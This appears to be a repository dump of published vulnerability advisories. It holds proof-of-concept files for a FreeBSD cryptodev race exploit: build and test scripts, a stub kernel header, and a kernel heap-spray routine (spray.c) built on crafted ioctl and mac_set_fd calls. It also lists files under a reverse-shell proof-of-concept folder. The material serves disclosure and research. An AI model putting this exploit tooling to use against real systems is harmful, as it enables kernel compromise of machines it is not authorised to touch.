4066/poc/reverseShell/usr/share/terminfo/76/vt100-top-s -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-vb -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-w: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-w -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-w-am: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-w-am -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-w-nam: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-w-nam -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-w-nav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-w-nav -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100nam: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100nam -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/78/xterm-256color: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/78/xterm-256color -------------------------------------------------------------------------------- /SSD Advisory - 4147/POC/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "Cleaning up old objects" 4 | 5 | { 6 | rm -f *.o hack 7 | echo "Cleanup complete" 8 | } || { 9 | echo "Failed to cleanup" 10 | exit 1 11 | } 12 | 13 | CC=gcc 14 | CLFAGS="-std=c11" 15 | 16 | if [ "$(which freebsd-version)" != '' ]; then 17 | CFLAGS="$CLFAGS -DREAL_BUILD=1" 18 | echo "Found other compiler"; 19 | fi 20 | 21 | { 22 | echo "Building..." 23 | $CC -g -c $CFLAGS hack.c -o hack.o && \ 24 | $CC -g -c $CFLAGS spray.c -o spray.o && \ 25 | $CC hack.o spray.o -o hack -g -lpthread 26 | echo "Done." 27 | } || { 28 | echo "Failed to build." 29 | exit 1 30 | } 31 | -------------------------------------------------------------------------------- /SSD Advisory - 4147/POC/fake_cryptodev.h: -------------------------------------------------------------------------------- 1 | /** 2 | * NOTE: this file is just a fake cryptodev.h used for 3 | * linting on the host computer. most of these are just 4 | * definitions that have been straight ripped out of the 5 | * FreeBSD sources. 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | #define CIOCGSESSION 3224396645 12 | #define CIOCCRYPT 3224396647 13 | #define CIOCFSESSION 2147771238 14 | #define CRIOGET 3221513060 15 | 16 | #define CRYPTO_AES_CBC 11 17 | #define CRYPTO_NULL_CBC 0 18 | #define CRYPTO_NULL_HMAC 0 19 | 20 | typedef const char* c_caddr_t; 21 | 22 | struct session_op { 23 | u_int32_t cipher; /* ie. CRYPTO_DES_CBC */ 24 | u_int32_t mac; /* ie. CRYPTO_MD5_HMAC */ 25 | 26 | u_int32_t keylen; /* cipher key */ 27 | c_caddr_t key; 28 | int mackeylen; /* mac key */ 29 | c_caddr_t mackey; 30 | 31 | u_int32_t ses; /* returns: session # */ 32 | }; 33 | 34 | /* 35 | * session and crypt _op structs are used by userspace programs to interact 36 | * with /dev/crypto. Confusingly, the internal kernel interface is named 37 | * "cryptop" (no underscore). 38 | */ 39 | struct session2_op { 40 | u_int32_t cipher; /* ie. CRYPTO_DES_CBC */ 41 | u_int32_t mac; /* ie. CRYPTO_MD5_HMAC */ 42 | 43 | u_int32_t keylen; /* cipher key */ 44 | c_caddr_t key; 45 | int mackeylen; /* mac key */ 46 | c_caddr_t mackey; 47 | 48 | u_int32_t ses; /* returns: session # */ 49 | int crid; /* driver id + flags (rw) */ 50 | int pad[4]; /* for future expansion */ 51 | }; 52 | 53 | struct crypt_op { 54 | u_int32_t ses; 55 | u_int16_t op; /* i.e. COP_ENCRYPT */ 56 | #define COP_ENCRYPT 1 57 | #define COP_DECRYPT 2 58 | u_int16_t flags; 59 | #define COP_F_CIPHER_FIRST 0x0001 /* Cipher before MAC. */ 60 | #define COP_F_BATCH 0x0008 /* Batch op if possible */ 61 | u_int len; 62 | c_caddr_t src; /* become iov[] inside kernel */ 63 | caddr_t dst; 64 | caddr_t mac; /* must be big enough for chosen MAC */ 65 | c_caddr_t iv; 66 | }; 67 | 68 | /* op and flags the same as crypt_op */ 69 | struct crypt_aead { 70 | u_int32_t ses; 71 | u_int16_t op; /* i.e. COP_ENCRYPT */ 72 | u_int16_t flags; 73 | u_int len; 74 | u_int aadlen; 75 | u_int ivlen; 76 | c_caddr_t src; /* become iov[] inside kernel */ 77 | caddr_t dst; 78 | c_caddr_t aad; /* additional authenticated data */ 79 | caddr_t tag; /* must fit for chosen TAG length */ 80 | c_caddr_t iv; 81 | }; 82 | 83 | /* 84 | * Parameters for looking up a crypto driver/device by 85 | * device name or by id. The latter are returned for 86 | * created sessions (crid) and completed key operations. 87 | */ 88 | struct crypt_find_op { 89 | int crid; /* driver id + flags */ 90 | char name[32]; /* device/driver name */ 91 | }; 92 | 93 | /* bignum parameter, in packed bytes, ... */ 94 | struct crparam { 95 | caddr_t crp_p; 96 | u_int crp_nbits; 97 | }; 98 | 99 | #define CRK_MAXPARAM 8 100 | 101 | struct crypt_kop { 102 | u_int crk_op; /* ie. CRK_MOD_EXP or other */ 103 | u_int crk_status; /* return status */ 104 | u_short crk_iparams; /* # of input parameters */ 105 | u_short crk_oparams; /* # of output parameters */ 106 | u_int crk_crid; /* NB: only used by CIOCKEY2 (rw) */ 107 | struct crparam crk_param[CRK_MAXPARAM]; 108 | }; -------------------------------------------------------------------------------- /SSD Advisory - 4147/POC/package.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | NAME=${PWD##*/} 4 | rm -f $NAME.tar.gz 5 | COPYFILE_DISABLE=1 tar zcvf $NAME.tar.gz build.sh package.sh test.sh $(ls *.c) $(ls *.h) writeup.md writeup.pdf -------------------------------------------------------------------------------- /SSD Advisory - 4147/POC/spray.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #define SYS_IOCTL_SMALL_SIZE 128 /* bytes */ 9 | #define DEBUG 0 10 | 11 | void spray(unsigned int spray_count, void* spray, unsigned int spray_length) { 12 | if ( spray_length <= SYS_IOCTL_SMALL_SIZE ) { 13 | for ( unsigned int i = 0; i < spray_count; i++ ) { 14 | struct mac m = (struct mac) { 15 | .m_buflen = spray_length, 16 | .m_string = spray 17 | }; 18 | 19 | if ( mac_set_fd(-1, &m) != 0 ) { 20 | if ( DEBUG ) perror("__mac_set_fd"); 21 | } 22 | } 23 | } 24 | else if ( spray_length < IOCPARM_MAX ) { 25 | unsigned long cmd = (spray_length << 16) | IOC_IN; 26 | 27 | for ( unsigned int i = 0; i < spray_count; i++ ) { 28 | if ( ioctl(0, cmd, spray) != 0 ) { 29 | if ( DEBUG ) perror("spray ioctl: "); 30 | } 31 | } 32 | } 33 | else { 34 | printf("spray length %u invalid (max %u)\n", spray_length, IOCPARM_MAX); 35 | exit(1); 36 | } 37 | } -------------------------------------------------------------------------------- /SSD Advisory - 4147/POC/spray.h: -------------------------------------------------------------------------------- 1 | void spray(unsigned int spray_count, void* spray, unsigned int spray_length); -------------------------------------------------------------------------------- /SSD Advisory - 4147/POC/test.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | SOURCE_HOST=192.168.56.1 # virtualbox host IP 4 | SOURCE_PROJ=cryptodev_race # project being downloaded 5 | 6 | echo "Loading cryptodev" 7 | { 8 | kldload cryptodev && \ 9 | kldload aesni 10 | } || { 11 | echo "cryptodev failed to load or already loaded" 12 | } 13 | 14 | # Download 15 | echo "Downloading project" 16 | { 17 | rm -rf test/ && \ 18 | mkdir test/ && \ 19 | wget http://$SOURCE_HOST:8000/$SOURCE_PROJ.tar.gz -O test/abc.tar.gz --quiet && \ 20 | tar -zxf test/abc.tar.gz -C test/ 21 | } || { 22 | echo "Failed to download latest project" 23 | exit 1 24 | } 25 | 26 | echo "Building project" 27 | { 28 | cd test/ &&\ 29 | sh build.sh 30 | } || { 31 | echo "Failed to compile" 32 | exit 1 33 | } 34 | -------------------------------------------------------------------------------- /license.md: -------------------------------------------------------------------------------- 1 | This work is licensed under the Creative Commons Attribution-ShareAlike 4.0 International License. To view a copy of this license, visit http://creativecommons.org/licenses/by-sa/4.0/ or send a letter to Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. 2 | --------------------------------------------------------------------------------